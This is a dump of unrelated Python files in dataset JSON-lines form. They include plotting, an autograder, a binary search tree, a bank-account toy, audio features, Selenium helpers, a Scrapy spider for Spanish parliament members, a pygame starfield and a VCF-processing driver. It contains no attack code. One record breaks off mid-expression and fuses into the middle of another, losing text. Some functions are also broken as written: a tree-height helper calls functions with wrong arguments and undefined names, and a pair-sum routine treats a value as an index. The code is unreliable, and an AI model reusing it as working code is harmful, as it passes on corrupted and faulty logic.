zip(X_sim, X_data, S_sim, S_data, P_sim, P_data)]\n delta_sum = np.sqrt(np.sum(deltas))\n\n return delta_sum\n\n# plot creation:\ndef plot_results(data_df, sim_df):\n sns.set()\n plt.plot(sim_df['t'], sim_df['X'], 'k:')\n plt.plot(sim_df['t'], sim_df['S'], 'r--')\n plt.plot(sim_df['t'], sim_df['P'], 'b-')\n plt.plot(data_df['t'], data_df['X'], 'ko')\n plt.plot(data_df['t'], data_df['S'], 'ro')\n plt.plot(data_df['t'], data_df['P'], 'bo')\n\n plt.fill_between(sim_df['t'], sim_df['P'], sim_df['P(mu)'], facecolor='skyblue')\n plt.fill_between(sim_df['t'], sim_df['P(mu)'], 0, facecolor='steelblue')\n\n plt.suptitle('Result of Parameter Estimation:')\n plt.title('[proportions of P(X) and P(µ) plotted in light and dark blue, respectively]')\n plt.xlabel('Time [h]')\n plt.ylabel('X / S [g/L] and P [mg/L]')\n plt.legend(['X (sim.)', 'S (sim.)', 'P (sim.)', 'X (data)', 'S (data)', 'P (data)'])\n plt.show()\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"70061528","text":"def docs_feedback_lossless_compression(link):\n from CRLS_APCSP_autograder.app.docs_labs.docs import get_text, exact_answer, keyword_and_length\n\n tests = list()\n text = get_text(link)\n test1a = exact_answer('1a. song name', [r'\\s1a\\. .+? tabledata \\s [a-zA-Z\\.0-9] .+? 2a\\.'], text, points=5)\n test2a = keyword_and_length('2a. Copy+paste compressed song', [r'[a-zA-Z]'], text,\n search_string=r'2a\\. .*? tabledata (.+?) 3a\\.', min_length=1, points=1)\n test3a = keyword_and_length('3a. Copy+paste dictionary', [r'[a-zA-Z]'], text,\n search_string=r'3a\\. .*? tabledata (.+?) 4a\\.', min_length=1, points=1)\n test4a = keyword_and_length('4a. Copy+paste stats', [r'[a-zA-Z]'], text,\n search_string=r'4a\\. .*? tabledata (.+?) 5a\\.', min_length=20, points=1)\n test5a = keyword_and_length('5a. What made compression hard', [r'[a-zA-Z]'], text,\n search_string=r'5a\\. .*? tabledata (.+?) 6a\\.', min_length=10, points=1)\n test6a = keyword_and_length('6a. Describe thinking process', [r'[a-zA-Z]'], text,\n search_string=r'6a\\. .*? tabledata (.+?) 7a\\.', min_length=10, points=1)\n test7a = keyword_and_length('7a. Possible to write instructions always better than heuristic?', [r'[a-zA-Z]'], text,\n search_string=r'7a\\. .*? tabledata (.+?) 8a\\.', min_length=10, points=1)\n test8a = keyword_and_length('8a. Possible to know most compressed?', [r'[a-zA-Z]'], text,\n search_string=r'8a\\. .*? tabledata (.+?) 9a\\.', min_length=8, points=1)\n test9a = keyword_and_length('9a. Can your friend read compressed? Dictionary?', [r'[a-zA-Z]'], text,\n search_string=r'9a\\. .*? tabledata (.+?) check \\s your \\s work', min_length=10, points=1)\n\n tests.extend([test1a, test2a, test3a, test4a, test5a, test6a, test7a, test8a, test9a])\n return tests\n","sub_path":"CRLS_APCSP_autograder/app/lossless_compression.py","file_name":"lossless_compression.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"261488688","text":"def RoseWind_Speed(df_city):\n # degs = [45, 90, ..., 360]\n\tdegs = np.arange(45,361,45)\n\ttmp = []\n\tfor deg in degs:\n\t # 获取 wind_deg 在指定范围的风速平均值数据\n\t\ttmp.append(df_city[(df_city['wind_deg']>(deg-46)) & (df_city['wind_deg']curr.data:\r\n if curr.right is None:\r\n curr.right=n\r\n break\r\n else:\r\n curr=curr.right\r\n else:\r\n break\r\n\r\ndef inorder(root):\r\n if root is None:\r\n return None\r\n inorder(root.left)\r\n print(root.data,end=' ')\r\n inorder(root.right)\r\n\r\ndef height(root):\r\n if root is None:\r\n return 0\r\n return 1+max(height(root.left),height(root.right))\r\ndef diameter(root):\r\n if root is None:\r\n return 0\r\n lheight=height(root.left)\r\n rheight=height(root.right)\r\n\r\n ldiameter=diameter(root.left)\r\n rdiameter=diameter(root.right)\r\n\r\n return max(lheight+rheight+1,max(ldiameter,rdiameter))\r\n#################\r\ndef height2(root):\r\n if root is None:\r\n return 0\r\n lheight=height(root.left,ar)\r\n rheight=height(root.right,ar)\r\n\r\n ar[0]=max(ar[0],lh+rh+1)\r\n return 1+max(height2(root.left,ar),height2(root.right,ar))\r\n\r\n\r\ndef diameter2(root):\r\n if root is None:\r\n return 0\r\n ar=[-sys.maxsize]\r\n height2(root,ar)\r\n return ar[0]\r\n##############\r\nob=BinarySearchTree()\r\nl=list(map(int,input().split()))\r\nfor i in l:\r\n ob.insert(i)\r\nprint('Inorder : ',end=' ')\r\ninorder(ob.root)\r\nprint()\r\n\r\nd=diameter(ob.root)\r\nprint('Diameter : ',d)\r\n","sub_path":"Trees/diameter_of_BST.py","file_name":"diameter_of_BST.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"128194572","text":"class Account():\n id = 0\n def __init__(self, owner, balance, rate):\n Account.id +=1\n accountnum = Account.id\n self.owner = owner.name\n self.account_number = accountnum\n self.balance = balance.value\n self.currency = balance.currency\n self.rate = rate/100\n\n def deposit(self, amount):\n self.balance = self.balance + amount.value\n\n def withdraw(self, amount):\n #add valid denoms logic here\n sum = Money('RM', amount)\n if sum.value:\n self.balance = self.balance - sum.value\n return sum.value\n\n def set_rate(self, new_rate):\n self.rate = new_rate/100\n\n def show_balance(self):\n print(f\"{self.currency} {self.balance}\")\n\n def accrue_interest(self, years):\n self.balance = self.balance*(1+self.rate)**years\n\nclass Money():\n valid_denoms = (100, 50, 20, 10, 5, 1)\n def __init__(self, currency, value):\n self.currency = currency\n copy = value\n for denom in self.valid_denoms:\n if copy >= denom:\n copy = copy - (copy//denom)*denom\n if copy == 0:\n self.value = value\n else:\n print(\"Not a valid denomination. Please try again.\")\n self.value = 0\n\n def __str__(self):\n return f\"{self.currency} {self.value}\"\n\nclass Holder():\n def __init__(self, name):\n self.name = name\n\namar = Holder('Amar')\n\nsum = Money('RM',9001)\n\namar_account = Account(amar, sum, 6)\n\nbreakpoint()","sub_path":"week_1/day-4/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"651183632","text":"#!/usr/bin/python\n# Put the scripts into a subfolder of the AVEC2018_CES package, e.g., AVEC2018_CES/scripts_CES/\n# Output: csv files with functionals of low-level descriptors (LLDs)\n\nimport os\nimport fnmatch\nimport numpy as np\nimport librosa\nimport pandas as pd\n\n# Folders with feature files\nfolder_lld_features = './egemaps_improv/'\nimprov_path = '/media/bagus/data01/dataset/MSP-IMPROV/'\n\n# Get all files\nfiles = fnmatch.filter(os.listdir(folder_lld_features), '*.csv') # filenames are the same for all modalities\nfiles.sort()\nfeat = []\n\n# Generate files with functionals\nfor fn in files:\n print(\"Processing ...\", fn)\n # extract 23 features from GeMAPS\n data = pd.read_csv(folder_lld_features+fn, sep=';', usecols=range(2, 25))\n \n # extract silence\n filename = ('session' + fn[18] + '/' + fn[11:15] + '/'\n + fn[20] + '/' + fn[:-4] + '.wav')\n y, sr = librosa.load(filename, sr=16000) \n # extract rms using different duration: 200 ms (3200), 500 ms (8000), \n # and 1 s (16000 samples), 128 ms (2048) \n rmse = librosa.feature.rms(y + 0.0001, frame_length=2048)[0]\n\n silence = 0\n for e in rmse:\n if e <= 0.3 * np.mean(rmse):\n silence += 1\n silence /= float(len(rmse))\n silence_np = np.array(silence).reshape(1,)\n \n X_func = np.concatenate((np.array(data.mean()), np.array(data.std()), silence_np))\n feat.append(X_func)\n\nfeat = np.array(feat)\nnp.save('./data/msp_feat_ws_128.npy', feat)\n","sub_path":"extract/msp_extract_hfs_ws.py","file_name":"msp_extract_hfs_ws.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"319192651","text":"#!/usr/local/bin/python3\n\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\"\"\" BasePageElement classes.\n Descriptors for getting and setting single elements.\n Available field locator types:\n ID,\n NAME,\n XPATH\n\n Extend a BasePageElement object:\n class TextFieldElement(BasePageElement)\n Instantiate extended object (inside of a Page class) with XPATH type:\n text_field = TextFieldElement('XPATH')\n Assign value to instantiated text_field:\n Page.text_field = \"value\"\n Retrieve value from instantiated text_field:\n Page.text_field\n\"\"\"\n\nclass BasePageElement(object):\n \"\"\" Base Page Element class that's initialized on every Page Object class. \"\"\"\n def __init__(self, element_type=None):\n ''' Initialize the BasePageElement object with its correct locator type. '''\n self.element_type = element_type\n\n def __set__(self, obj, value):\n ''' Set the text to the value element. '''\n driver = obj.driver\n\n # Set text to element found by id\n if self.element_type == 'ID':\n WebDriverWait(driver, 30).until(\n lambda driver: driver.find_element_by_id(self.locator)\n )\n driver.find_element_by_id(self.locator).clear()\n driver.find_element_by_id(self.locator).send_keys(value)\n\n # Set text to element found by name\n elif self.element_type == 'NAME':\n WebDriverWait(driver, 30).until(\n lambda driver: driver.find_element_by_name(self.locator)\n )\n driver.find_element_by_name(self.locator).clear()\n driver.find_element_by_name(self.locator).send_keys(value)\n\n # Set text to element found by xpath\n elif self.element_type == 'XPATH':\n WebDriverWait(driver, 30).until(\n lambda driver: driver.find_element_by_xpath(self.locator)\n )\n driver.find_element_by_xpath(self.locator).clear()\n driver.find_element_by_xpath(self.locator).send_keys(value)\n\n def __get__(self, obj, owner):\n ''' Get the text of specified element. '''\n driver = obj.driver\n\n # Get text of element found by id\n if self.element_type == 'ID':\n WebDriverWait(driver, 30).until(\n lambda driver: driver.find_element_by_id(self.locator)\n )\n element = driver.find_element_by_id(self.locator)\n\n # Get text of element found by name\n elif self.element_type == 'NAME':\n WebDriverWait(driver, 30).until(\n lambda driver: driver.find_element_by_name(self.locator)\n )\n element = driver.find_element_by_name(self.locator)\n\n # Get text of element found by xpath\n elif self.element_type == 'XPATH':\n WebDriverWait(driver, 30).until(\n lambda driver: driver.find_element_by_xpath(self.locator)\n )\n element = driver.find_element_by_xpath(self.locator)\n return element.get_attribute(\"value\")\n","sub_path":"includes/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"23755971","text":"from time import time\nfrom random import randint\n\ndef partA(a_list, an_int):\n sorted_list = sorted(a_list)\n high = len(a_list) - 1\n low = 0\n while low < high:\n if sorted_list[low] + sorted_list[high] == an_int: return True\n elif sorted_list[low] + sorted_list[high] > an_int: high -= 1\n else: low += 1\n return False\n\ndef partB(a_list, an_int):\n smallest = max(a_list)\n index_smallest = a_list.index(smallest)\n for i in range(len(a_list)-1):\n if i != index_smallest:\n if a_list[smallest]+a_list[i] == an_int:\n return True\n return False\n\nif __name__ == '__main__':\n a_list = [10,1,2,3,4,5,6,7,8,9,10]\n\n start = time()\n print(partA(a_list, 20))\n print('%.10f' % (time() - start))\n\n start = time()\n print(partB(a_list, 20))\n print('%.10f' % (time() - start))\n\n #print()\n #a_list = [randint(0, 10) for i in range(10)]\n #print(a_list)\n\n #start = time()\n #print(partA(a_list, 20))\n #print('%.10f' % (time() - start))\n\n #start = time()\n #print(partB(a_list, 20))\n #print('%.10f' % (time() - start))\n\n\n","sub_path":"COMP9101/Assignment1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"451477588","text":"from abc import ABCMeta\n\nfrom .utils.conformance import verify_conformance, verify_not_overridden\nfrom .utils.docs import update_docs\n\n\nclass InterfaceMeta(ABCMeta):\n \"\"\"\n A metaclass that helps subclasses of a class to conform to its API.\n\n It also makes sure that documentation that might be useful to a user\n is inherited appropriately, and provides a hook for class to handle\n subclass operations.\n \"\"\"\n\n INTERFACE_EXPLICIT_OVERRIDES = True\n INTERFACE_RAISE_ON_VIOLATION = False\n INTERFACE_SKIPPED_NAMES = {'__init__'}\n\n def __init__(cls, name, bases, dct):\n ABCMeta.__init__(cls, name, bases, dct)\n\n # Register interface class for subclasses\n if not hasattr(cls, '__interface__'):\n cls.__interface__ = cls\n\n # Read configuration\n explicit_overrides = cls.__get_config(bases, dct, 'INTERFACE_EXPLICIT_OVERRIDES')\n raise_on_violation = cls.__get_config(bases, dct, 'INTERFACE_RAISE_ON_VIOLATION')\n skipped_names = cls.__get_config(bases, dct, 'INTERFACE_SKIPPED_NAMES')\n\n # Iterate over names in `dct` and check for conformance to interface\n for key, value in dct.items():\n\n # Skip any key in skipped_names\n if key in skipped_names: # pragma: no cover\n continue\n\n # Identify the first instance of this key in the MRO, if it exists, and check conformance\n is_override = False\n for base in cls.__mro__[1:]:\n if base is object:\n continue\n if key in base.__dict__:\n is_override = True\n cls.__verify_conformance(\n key, name, value, base.__name__, base.__dict__[key],\n explicit_overrides=explicit_overrides,\n raise_on_violation=raise_on_violation\n )\n break\n\n if not is_override:\n verify_not_overridden(key, name, value, raise_on_violation=raise_on_violation)\n\n # Update documentation\n cls.__update_docs(cls, name, bases, dct)\n\n # Call subclass registration hook\n cls.__register_implementation__()\n\n def __register_implementation__(cls):\n pass\n\n @classmethod\n def __get_config(mcls, bases, dct, key):\n default = getattr(mcls, key, None)\n if bases:\n default = getattr(bases[0], key, default)\n return dct.get(key, default)\n\n @classmethod\n def __verify_conformance(mcls, key, name, value, base_name, base_value,\n explicit_overrides=True, raise_on_violation=False):\n return verify_conformance(\n key, name, value, base_name, base_value,\n explicit_overrides=explicit_overrides,\n raise_on_violation=raise_on_violation\n )\n\n @classmethod\n def __update_docs(mcls, cls, name, bases, dct):\n skipped_names = mcls.__get_config(bases, dct, 'INTERFACE_SKIPPED_NAMES')\n return update_docs(cls, name, bases, dct, skipped_names=skipped_names)\n","sub_path":"interface_meta/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"590870947","text":"import urlparse\n\n\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\nfrom scrapy.selector import HtmlXPathSelector, Selector\nfrom scrapy.item import Item, Field\nimport pdb\nimport re\nfrom dateutil.parser import parse\n\nfrom scrap.congreso.congreso import Congress\n\nfrom scrap.items import MemberItem\n\n\nclass MemberSpider(CrawlSpider):\n name = 'members'\n allowed_domains = ['congreso.es', ]\n start_urls = ['http://www.congreso.es/portal/page/portal/Congreso'\n '/Congreso/Diputados?_piref73_1333056_73_1333049_13'\n '33049.next_page=/wc/menuAbecedarioInicio&tipoBusqu'\n 'eda=completo&idLegislatura=12' ]\n\n rules = []\n rules.append(\n Rule(LinkExtractor(\n allow=['fichaDiputado\\?idDiputado=\\d+&idLegislatura=12'], unique=True),\n callback='parse_member'))\n rules.append(\n Rule(LinkExtractor(\n allow=['busquedaAlfabeticaDiputados&paginaActual=\\d+&idLeg'\n 'islatura=12'\n '&tipoBusqueda=completo'], unique=True), follow=True))\n\n\n\n\n\n\n\n def parse_member(self, response):\n\n\n # extract full name of member\n names = Selector(response).xpath('//div[@class=\"nombre_dip\"]/text()').extract()\n # extra text like member's state\n curriculum = Selector(response).xpath('//div[@class=\"texto_dip\"]/ul/li/div[@class=\"dip'\n '_rojo\"]')\n\n # email, twitter ....\n extra_data = Selector(response).xpath('//div[@class=\"webperso_dip\"]/div/a/@href')\n avatar = Selector(response).xpath('//div[@id=\"datos_diputado\"]/p[@class=\"logo_g'\n 'rupo\"]/img[@name=\"foto\"]/@src').extract()\n\n item = MemberItem()\n\n item['url'] = response.url\n item['nombre']=\"\"\n item['imagen']=\"\"\n item['grupo']=\"\"\n item['fecha_alta']=\"\"\n item['fecha_baja']=\"\"\n item['web']=\"\"\n item['correo']=\"\"\n item['twitter']=\"\"\n\n if names:\n second_name, name = names[0].split(',')\n item['nombre'] = second_name.strip()+\", \"+name.strip()\n if avatar:\n item['imagen'] = 'http://www.congreso.es' + avatar[0]\n if curriculum:\n\n group = curriculum.xpath('a/text()')\n\n #pdb.set_trace()\n if group:\n # url is in list, extract it\n item['grupo'] = re.search('\\((.*?)\\)', group.extract()[0]).group(1).strip()\n #item['party_logo'] = 'http://www.congreso.es' +Selector(response).xpath('//div[@id=\"datos_diputado\"]/p[@cl'\n # 'ass=\"logo_grupo\"]/a/img/@src').\\\n # extract()[0] #logo de partido\n #item['party_name'] = Selector(response).xpath('//div[@id=\"datos_diputado\"]/p[@clas'\n # 's=\"nombre_grupo\"]/text()').extract()[0] #nombre partido\n\n\n # add dates of inscription and termination\n ins_date = curriculum.re('(?i)(?<=fecha alta:)[\\s]*[\\d\\/]*')\n if ins_date:\n item['fecha_alta'] = parse\\\n (ins_date[0], dayfirst=True)\n term_date = curriculum.re('(?i)(?<=caus\\xf3 baja el)[\\s]*['\n '\\d\\/]*')\n if term_date:\n item['fecha_baja'] = parse\\\n (term_date[0], dayfirst=True)\n\n if extra_data:\n web_data = Selector(response).xpath('//div[@class=\"webperso_dip\"]/div[@class=\"'\n 'webperso_dip_parte\"]/a/@href')\n if web_data:\n web = web_data.re('[http|https]*://.*')\n if web:\n item['web'] = web[0]\n email = extra_data.re('mailto:[\\w.-_]*@[\\w.-_]*')\n if email:\n item['correo'] = email[0].replace('mailto:', '')\n twitter = extra_data.re('[http|https]*://(?:twitter.com)/[\\w]*')\n if twitter:\n item['twitter'] = twitter[0]\n congress = Congress()\n search = congress.getMember(name=item['nombre'])\n if not search:\n item['tipi']=False\n item['activo']=True\n congress.updateorinsertMember(type=\"insert\",item=item)\n else:\n congress.updateorinsertMember(type=\"update\", item=item)\n return item\n\n","sub_path":"scrap/scrap/spiders/members.py","file_name":"members.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"251648895","text":"from math import cos, sin\nfrom random import random, randint\nimport pygame\n\nSCREEN_SIZE = WIDTH, HEIGHT = 1080, 720\nCENTER_X, CENTER_Y = WIDTH // 2, HEIGHT // 2\n\nBASE_COLOR = pygame.color.Color(0, 255, 0)\nBASE_COLOR_H, BASE_COLOR_S, BASE_COLOR_V, BASE_COLOR_A = BASE_COLOR.hsva\n\nWORLD_SIZE = 1000\nDISTANCE_TO_VIEWING_PLANE = 200\n\nFONT = None\n\nmouse_x, mouse_y = (0, 0)\nis_space_pressed = False\n\nspeed = 2\nangle = 0.01\n\nscreen = pygame.display.set_mode(SCREEN_SIZE)\nclock = pygame.time.Clock()\nFPS = 60\n\nstars = []\nstars_prev = []\n\n\ndef init():\n global FONT\n\n pygame.init()\n FONT = pygame.font.Font(None, 22)\n\n for i in range(2000):\n x, y, z = randint(-WORLD_SIZE, WORLD_SIZE), \\\n randint(-WORLD_SIZE, WORLD_SIZE), \\\n randint(1, WORLD_SIZE)\n stars.append((x, y, z))\n stars_prev.append((x, y, z))\n\n\ndef perspective_transform(x, y, z):\n x_plane = 0 if z * x == 0 else DISTANCE_TO_VIEWING_PLANE / z * x\n y_plane = 0 if z * x == 0 else DISTANCE_TO_VIEWING_PLANE / z * y\n return x_plane, y_plane\n\n\ndef to_center(x, y):\n return x + WIDTH // 2, y + HEIGHT // 2\n\n\ndef rotation(x, y, angle):\n x1 = x * cos(angle) - y * sin(angle)\n y1 = x * sin(angle) + y * cos(angle)\n return x1, y1\n\n\ndef draw(screen):\n screen.fill((0, 0, 0))\n\n for i in range(len(stars)):\n star_xyz = stars[i]\n prev_star_xyz = stars_prev[i]\n\n color = pygame.color.Color(0, 0, 0)\n v = 100 * (1 - (star_xyz[2] / WORLD_SIZE))\n v = 100 if v > 100 else v\n v = 0 if v < 0 else v\n color.hsva = BASE_COLOR_H, BASE_COLOR_S, v, BASE_COLOR_A\n\n star_screen_x, star_screen_y = to_center(*perspective_transform(*star_xyz))\n prev_star_screen_x, prev_star_screen_y = to_center(*perspective_transform(*prev_star_xyz))\n\n #pygame.draw.circle(screen, color, (int(star_screen_x), int(star_screen_y)), 2)\n pygame.draw.line(screen, color,\n (int(star_screen_x), int(star_screen_y)),\n (int(prev_star_screen_x), int(prev_star_screen_y)),\n 2)\n\n\n pygame.draw.circle(screen, (255, 255, 255), to_center(0, 0), 20, 2)\n pygame.draw.line(screen, (255, 255, 255), to_center(0, -30), to_center(0, +30), 2)\n pygame.draw.line(screen, (255, 255, 255), to_center(-30, 0), to_center(+30, 0), 2)\n\n debug_text = FONT.render(f'speed: {speed}, angle: {angle}', 1, (255, 255, 255))\n screen.blit(debug_text, (5, 5))\n\n\ndef update():\n global speed, angle\n speed = ((HEIGHT // 2) - mouse_y) // 20\n\n if is_space_pressed:\n speed = speed * 2\n\n angle = ((WIDTH // 2) - mouse_x) / 10000\n\n if is_space_pressed:\n angle = angle * 2\n\n\n for i in range(len(stars)):\n x, y, z = stars[i]\n\n stars_prev[i] = x, y, z\n\n x, y = rotation(x, y, angle)\n z = z - speed\n\n if z < 1:\n z = WORLD_SIZE\n stars_prev[i] = x, y, z\n\n if z > WORLD_SIZE:\n z = 1\n stars_prev[i] = x, y, z\n\n stars[i] = x, y, z\n\n\ninit()\n\nrunning = True\n\nwhile running:\n # внутри игрового цикл еще один цикл\n # приема и обработки сообщений\n events = pygame.event.get()\n for event in events:\n # при закрытии окна\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.MOUSEMOTION:\n mouse_x, mouse_y = event.pos\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n is_space_pressed = True\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n is_space_pressed = False\n\n # отрисовка объектов\n draw(screen)\n\n # изменение свойств объектов\n update()\n\n # пауза на 1 / FPS cek\n clock.tick(FPS)\n\n # обновление экрана\n pygame.display.flip()\n\npygame.quit()","sub_path":"3Stars/stars-3d.py","file_name":"stars-3d.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"486399924","text":"import sys\nimport getopt\nimport os\nfrom collections import Counter\nimport merge_bams\nimport get_depth\nimport get_vcfs\nimport remove_chr00\nimport unknown_N_filter\nimport get_known_data\nimport filter_vcfs\n\n\ndef main(args):\n \"\"\"\n Main program called in order to run any of the vcf scripts.\n Usage: python main.py [function_called] -i \n :param: args\n Required command line input:\n [function_called] - Input the function_called you would like to perform from the following list:\n get_vcfs - generates vcfs from bam files\n remove_chr00 - filters out chr00 and chr00's breakend partners\n get_known_data - finds the evidence distribution of vcf files\n filter_vcfs - filters out SVs based on evidence\n all - performs all of the above functions\n -i = Input the file or directory to be examined or parsed.\n Please note that if one would like to run more than one command, then one ought to input the base\n directory with all of the files contained directly therein. Currently, this program is not designed to\n walk through the main directory to find files based on extensions as it seems unneccessary and we do not\n want to have users accidentally run lumpy on a bunch of forgotten, hidden bam files. However, this may be\n changed.\n Additional Requirements for specific functions:\n get_known_data & all\n -d = Input the file to be search through for the read depth. Each line in the file\n should be formatted as follows: \".bam:\\n\"\n -t = Input the file that contains all SVs known to exist and be true. This file\n should be formatted as follows: \"::\n :\"\n Please note that you may add as many SV types as you would like.\n -f = Input the file that contains all SVs known not to exist. This file\n should be formatted as follows: \"::\n :\"\n Please note that you may add as many SV types as you would like.\n filter_vcfs\n -d = Input the file to be search through for the read depth. Each line in the file\n should be formatted as follows: \".bam:\\n\"\n\n\n :return: Number indicating whether main ran successfully.\n 0 - ran successfully\n 1 - does not recognize the function called by the command line.\n 2 - no function was called.\n 3 - does not recognize an option that was specified.\n 4 - user specified that they wanted to run all functions but also specific functions.\n 5 - function called more than once. This is not supported due to the methods by which empty parameter fields\n are filled in (i.e. it would not make sense for a filter_vcf call to take a filtered vcf as its input).\n 6 - missing an original input file; the first function has no input file.\n 7 - missing an original read depth file; the first function that requires read depth has no read depth file.\n 8 - missing an original true positive file; the first function that requires false positives has no false\n positives file.\n 9 - missing an original false positive file; the first function that requires true positives has no true\n positives file.\n \"\"\"\n\n subcommands = [\n (\"merge_bams\", []),\n (\"get_depth\", []),\n (\"get_vcfs\", []),\n (\"remove_chr00\", []),\n (\"unknown_N_filter\", []),\n (\"get_known_data\", []),\n (\"filter_vcfs\", []),\n (\"all\", [])\n ]\n\n start = -1\n last_matching_index = -1\n is_function_called = False\n for i in range(len(subcommands)):\n j = 0\n while j in range(len(args)):\n if not args[j].startswith('-'):\n if args[j] not in [pair[0] for pair in subcommands] and args[j].find('/') == -1:\n print(\"Error: Invalid function called.\")\n print(main.__doc__)\n return 1\n if subcommands[i][0] == args[j]:\n is_function_called = True\n if start != -1 and last_matching_index != -1:\n for arg in args[start:j]:\n subcommands[last_matching_index][1].append(arg)\n start = j + 1\n last_matching_index = i\n break\n j += 1\n if i == len(subcommands) - 1:\n for arg in args[start:]:\n subcommands[last_matching_index][1].append(arg)\n if not is_function_called:\n print(\"You must select at least one function.\")\n return 2\n\n for pair in subcommands:\n if len(pair[1]) == 0:\n continue\n function_called = pair[0]\n try:\n opts, args = getopt.getopt(pair[1], 'i:o:d:t:f:r:h')\n except getopt.GetoptError:\n print(\"Error: Invalid command line option.\")\n print(main.__doc__)\n return 3\n\n input = ''\n output = ''\n reference = ''\n depth_file = ''\n true_positive_dict = {}\n false_positive_dict = {}\n multiplicity = Counter([pair[0] for pair in opts])\n if list(filter(lambda a: a != 0 and a != 1, multiplicity.values())):\n print(\"Error: an option was repeated. for multiple files, please use directories.\")\n return 3.5\n for opt, arg in opts:\n if opt == '--h':\n print(main.__doc__)\n elif opt == '-i':\n if arg.find(os.getcwd()) == -1:\n if arg.startswith('/'):\n input = os.getcwd() + arg\n else:\n input = os.getcwd() + '/' + arg\n else:\n input = arg\n if input.endswith('/'):\n input = input[:-1]\n elif opt == '-o':\n if arg.find(os.getcwd()) == -1:\n output = os.getcwd() + '/' + arg\n else:\n output = arg\n if function_called == \"get_depth\" or function_called == \"get_known_data\" and os.path.isdir(output):\n print(\"Error: get_depth and get_known_data cannot take a directory as an output.\")\n return 10\n elif opt == '-r':\n if arg.find(os.getcwd()) == -1:\n if arg.startswith('/'):\n reference = os.getcwd() + arg\n else:\n reference = os.getcwd() + '/' + arg\n else:\n reference = arg\n if not os.path.isfile(reference):\n print(\"Error: The reference file must be a file.\")\n return 10\n elif opt == '-d':\n if arg.find(os.getcwd()) == -1:\n depth_file = os.getcwd() + '/' + arg\n else:\n depth_file = arg\n if not os.path.isfile(depth_file):\n print(\"Error: The depth file must be a file.\")\n return 10\n elif opt == '-t':\n if arg.find(os.getcwd()) == -1:\n true_positive_file = os.getcwd() + '/' + arg\n else:\n true_positive_file = arg\n if not os.path.isfile(true_positive_file):\n print(\"Error: The provided true positive file must be a file.\")\n return 10\n reading_true_positive = open(true_positive_file)\n true_positive_dict = {}\n line = reading_true_positive.readline()\n while line:\n info = line.split(':')\n true_positive_dict[info[0] + '.' + info[1]] = [info[2] + '.' + info[3]]\n for left in info[4:]:\n if left.endswith('\\n'):\n left = left[:left.rfind('\\n')]\n true_positive_dict[info[0] + '.' + info[1]].append(left)\n line = reading_true_positive.readline()\n reading_true_positive.close()\n elif opt == '-f':\n if arg.find(os.getcwd()) == -1:\n false_positive_file = os.getcwd() + '/' + arg\n else:\n false_positive_file = arg\n if not os.path.isfile(false_positive_file):\n print(\"Error: The provided false positive file must be a file.\")\n return 10\n reading_false_positive = open(false_positive_file)\n false_positive_dict = {}\n line = reading_false_positive.readline()\n while line:\n info = line.split(':')\n false_positive_dict[info[0] + '.' + info[1]] = [info[2] + '.' + info[3]]\n for left in info[4:]:\n if left.endswith('\\n'):\n left = left[:left.rfind('\\n')]\n false_positive_dict[info[0] + '.' + info[1]].append(left)\n line = reading_false_positive.readline()\n reading_false_positive.close()\n\n if function_called == \"merge_bams\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n elif function_called == \"get_depth\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n elif function_called == \"get_vcfs\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n elif function_called == \"remove_chr00\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n elif function_called == \"unknown_N_filter\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n pair[1].append(reference)\n elif function_called == \"get_known_data\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n pair[1].append(depth_file)\n pair[1].append(true_positive_dict)\n pair[1].append(false_positive_dict)\n elif function_called == \"filter_vcfs\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n pair[1].append(depth_file)\n elif function_called == \"all\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n pair[1].append(depth_file)\n pair[1].append(reference)\n pair[1].append(true_positive_dict)\n pair[1].append(false_positive_dict)\n\n if not (\"all\", []) in subcommands and not ((\"merge_bams\", []) in subcommands and (\"get_depth\", []) in subcommands\n and (\"get_vcfs\", []) in subcommands and (\"remove_chr00\", []) in subcommands and\n (\"get_known_data\", []) in subcommands and (\"filter_vcfs\", []) in subcommands):\n print(\"Please clarify your command. Would you like to run all processes or %s\" %\n ([pair[0] for pair in subcommands].remove(\"all\")))\n return 4\n if not (\"all\", []) in subcommands:\n # merge_bams\n subcommands[0][1].append(subcommands[7][1][0])\n subcommands[0][1].append('')\n\n # get_depth\n subcommands[1][1].append('')\n subcommands[1][1].append('')\n\n # get_vcfs\n subcommands[2][1].append('')\n 